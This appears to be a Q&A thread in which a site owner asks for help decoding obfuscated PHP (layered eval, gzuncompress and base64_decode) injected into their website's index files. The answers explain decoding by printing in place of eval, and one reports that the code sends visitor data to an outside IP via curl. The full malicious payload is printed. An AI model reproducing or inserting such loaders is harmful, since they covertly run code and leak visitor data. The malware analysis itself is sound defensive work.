# PHP: Help decoding malicious code

Tags: php, wordpress, eval, decode

```
eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM=')));  eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ==')));  eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I=')));
```

I need help decoding that entire script, someone recently added it to several index files on my website. I have since blocked access from their IP, removed the modified code and am in the process of disabling the `eval()` function.

Comment: Change eval() to echo() and you'll see the code. However, blocking the IP probably won't be enough. If someone crawled in from one IP, they can probably crawl in through ANY ip. Figure out what the hole is and plug that. Anything else is just a bandaid.

Comment: You may also want to analyse how they got access to your files. Blocked IPs are not sufficient.

Comment: I had unused timthumb's in other themes that allowed access to any website, they have since been removed. I have removed all unnecessary files on my website as well. If it happens again, it ought to be easier to find.

Answer (score 4, accepted):

Just let it decode itself: Print the content within the `eval()`-part

```
php > var_dump(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM=')));  eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ==')));
string(33) "$GLOBALS['_2143977049_']=Array();"
```

Answer (score 2):

Basically this script kiddie code calls `http://91_196_216_64/btt.php?ip.....` and reports back "REMOTE_ADDR", 'HTTP_HOST', 'HTTP_USER_AGENT' and 'HTTP_REFERER' using 'curl*'.

You may want to block any TCP/UDP traffic to that IP on your router (NOT server) level or spend some $$$ to host your server behind a firewall.

**Edit**: If a server is compromised, security hole(s) can be installed anywhere, do ensure that your backup data are up to date and a standby server is ready to take over anytime.

Answer (score 1):

Change that eval to a print, and you'll see the code they're trying to execute.

Answer (score 1):

Just `echo` instead of `eval`.  Often times there are many layers to it, but with a little manual de-obfuscation after uncompressing it, you can figure out what is going on.